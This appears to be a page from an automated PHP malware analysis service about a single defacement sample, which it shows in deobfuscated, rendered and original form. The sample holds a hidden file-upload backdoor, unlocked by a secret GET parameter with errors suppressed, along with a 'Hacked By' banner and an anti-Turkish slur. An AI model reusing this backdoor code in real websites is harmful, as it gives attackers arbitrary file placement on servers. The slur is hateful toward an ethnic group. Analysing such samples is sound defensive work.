PHP Malware Analysis

index

md5: e96bd4eb7cccd36b406cfbac04e4e5cd

Jump to:

Screenshot


Attributes

Environment

Files

Input

Title

URLs


Deobfuscated PHP code

<?php

error_reporting(0);
if ($_GET['Fox'] == 'TYewh') {
    $saw1 = $_FILES['file']['tmp_name'];
    $saw2 = $_FILES['file']['name'];
    echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>";
    move_uploaded_file($saw1, $saw2);
    exit(0);
}
error_reporting(0);
if ($_GET['Fox'] == 'DZeU2') {
    $saw1 = $_FILES['file']['tmp_name'];
    $saw2 = $_FILES['file']['name'];
    echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>";
    move_uploaded_file($saw1, $saw2);
    exit(0);
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>kurdish</title>




    
        
        <style>
    body{
background-image: url("https://b.top4top.io/p_2142vmax51.jpg");
background-size: 100%;
    }

#i{
    opacity: 0.5;
}


        </style></head><body>

<div style="color: white;" id="h">
<div style="text-align: right;">

    </div>
<h1 style="text-align: center;"><big><big><big><big><span style="color: rgb(51, 0, 51);">Hacked</span> <span style="color: rgb(51, 51, 255);">By</span> <span style="color: red;">Kai</span>t<span style="color: yellow;">o </span>K<span style="color: rgb(255, 153, 0);">id</span></big></big></big></big></h1>
</div>

<div style="text-align: center;">
<div id="i" style="text-align: center;"><br>


<br>
<br>
<img style="width: 700px; height: 700px;" src="https://d.top4top.io/p_2142fzerk2.jpg"><br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
</div>
<big style="color: black;"><big><big><big><big><big><big><big><big><big>Fuck Turkish<br>
<br>
<br>
<br>
</big></big></big></big></big></big></big></big></big></big>




<audio controls autoplay>
    <source src="https://j.top4top.io/m_2142g2zbz1.mp3" type="audio/ogg">
    
  </audio>


    </div>
</body></html>

Execution traces


Generated HTML code

<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">&lt;?php error_reporting(0); if($_GET['Fox'] == 'TYewh'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "&lt;form method='POST' enctype='multipart/form-data'&gt;&lt;input type='file' name='file' /&gt;&lt;input type='submit' value='UPload' /&gt;&lt;/form&gt;"; move_uploaded_file($saw1,$saw2); exit(0); } ?&gt;
&lt;?php error_reporting(0); if($_GET['Fox'] == 'DZeU2'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "&lt;form method='POST' enctype='multipart/form-data'&gt;&lt;input type='file' name='file' /&gt;&lt;input type='submit' value='UPload' /&gt;&lt;/form&gt;"; move_uploaded_file($saw1,$saw2); exit(0); } ?&gt;
&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
&lt;html&gt;&lt;head&gt;&lt;title&gt;kurdish&lt;/title&gt;




    
        
        &lt;style&gt;
    body{
background-image: url("https://b.top4top.io/p_2142vmax51.jpg");
background-size: 100%;
    }

#i{
    opacity: 0.5;
}


        &lt;/style&gt;&lt;/head&gt;&lt;body&gt;

&lt;div style="color: white;" id="h"&gt;
&lt;div style="text-align: right;"&gt;

    &lt;/div&gt;
&lt;h1 style="text-align: center;"&gt;&lt;big&gt;&lt;big&gt;&lt;big&gt;&lt;big&gt;&lt;span style="color: rgb(51, 0, 51);"&gt;Hacked&lt;/span&gt; &lt;span style="color: rgb(51, 51, 255);"&gt;By&lt;/span&gt; &lt;span style="color: red;"&gt;Kai&lt;/span&gt;t&lt;span style="color: yellow;"&gt;o &lt;/span&gt;K&lt;span style="color: rgb(255, 153, 0);"&gt;id&lt;/span&gt;&lt;/big&gt;&lt;/big&gt;&lt;/big&gt;&lt;/big&gt;&lt;/h1&gt;
&lt;/div&gt;

&lt;div style="text-align: center;"&gt;
&lt;div id="i" style="text-align: center;"&gt;&lt;br&gt;


&lt;br&gt;
&lt;br&gt;
&lt;img style="width: 700px; height: 700px;" src="https://d.top4top.io/p_2142fzerk2.jpg"&gt;&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;/div&gt;
&lt;big style="color: black;"&gt;&lt;big&gt;&lt;big&gt;&lt;big&gt;&lt;big&gt;&lt;big&gt;&lt;big&gt;&lt;big&gt;&lt;big&gt;&lt;big&gt;Fuck Turkish&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;/big&gt;&lt;/big&gt;&lt;/big&gt;&lt;/big&gt;&lt;/big&gt;&lt;/big&gt;&lt;/big&gt;&lt;/big&gt;&lt;/big&gt;&lt;/big&gt;




&lt;audio controls autoplay&gt;
    &lt;source src="https://j.top4top.io/m_2142g2zbz1.mp3" type="audio/ogg"&gt;
    
  &lt;/audio&gt;


    &lt;/div&gt;
&lt;/body&gt;&lt;/html&gt;</pre></body></html>

Original PHP code

<?php error_reporting(0); if($_GET['Fox'] == 'TYewh'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; move_uploaded_file($saw1,$saw2); exit(0); } ?>
<?php error_reporting(0); if($_GET['Fox'] == 'DZeU2'){$saw1 = $_FILES['file']['tmp_name'];$saw2 = $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"; move_uploaded_file($saw1,$saw2); exit(0); } ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>kurdish</title>




    
        
        <style>
    body{
background-image: url("https://b.top4top.io/p_2142vmax51.jpg");
background-size: 100%;
    }

#i{
    opacity: 0.5;
}


        </style></head><body>

<div style="color: white;" id="h">
<div style="text-align: right;">

    </div>
<h1 style="text-align: center;"><big><big><big><big><span style="color: rgb(51, 0, 51);">Hacked</span> <span style="color: rgb(51, 51, 255);">By</span> <span style="color: red;">Kai</span>t<span style="color: yellow;">o </span>K<span style="color: rgb(255, 153, 0);">id</span></big></big></big></big></h1>
</div>

<div style="text-align: center;">
<div id="i" style="text-align: center;"><br>


<br>
<br>
<img style="width: 700px; height: 700px;" src="https://d.top4top.io/p_2142fzerk2.jpg"><br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
</div>
<big style="color: black;"><big><big><big><big><big><big><big><big><big>Fuck Turkish<br>
<br>
<br>
<br>
</big></big></big></big></big></big></big></big></big></big>




<audio controls autoplay>
    <source src="https://j.top4top.io/m_2142g2zbz1.mp3" type="audio/ogg">
    
  </audio>


    </div>
</body></html>